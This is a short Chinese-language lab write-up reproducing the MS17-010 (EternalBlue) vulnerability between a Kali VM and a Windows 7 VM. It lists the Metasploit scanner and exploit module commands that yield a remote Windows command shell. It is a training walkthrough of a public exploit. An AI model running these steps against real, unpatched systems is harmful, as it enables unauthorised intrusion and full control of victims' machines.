MS17-010漏洞复现
实验环境:
kali (虚拟机)
Windows 7 x64(虚拟机)
1、查看两台机器的IP地址,且关闭win7防火墙
可见win7 IP为: 192.168.15.129
kali 为:192.168.15.130
2、使用mdfconsole
在此之前需要进行端口扫描,需要确保win7的445端口开放,知道自己的没有关闭此端口,所以在这不进行端口确认了,像验证的可以利用nmap进行扫描,具体指令百度康康。
启动 mdfconsole:
-msfconsole
使用如下命令:
- use auxiliary/scanner/smb/smb_ms17_010
- show targets
- show options
第一句为利用auxiliary/scanner/smb/smb_ms17_010进漏洞分析,看看这个445端口是否能被入侵。
先使用show options查看这个模块的选项,在Required那列中,yes的是必填的,no是选填的,默认已经写好了大部分的参数,但还是需要手动设置一下RHOSTS的参数,即攻击的主机ip,这里我们写被攻击的win7的 ip。
设置RHOSTS 为win7的地址,之后执行run。看到结果绿色加号那行,主机可能存在MS17-010漏洞。确认可以通过MS17-010漏洞入侵。
使用攻击模块 use exploit/windows/smb/ms17_010_eternalblue,
用show targets 查看该模块适用的主机系统
show options 查看选项。
只要设置RHOST为被攻击主机地址即可。
set RHOST xxx.xxx.xxx.xxx(被攻击主机地址)
执行run
当结束后,看到C:\Windows\system32> 即渗透成功,可以进行其余有趣的操作。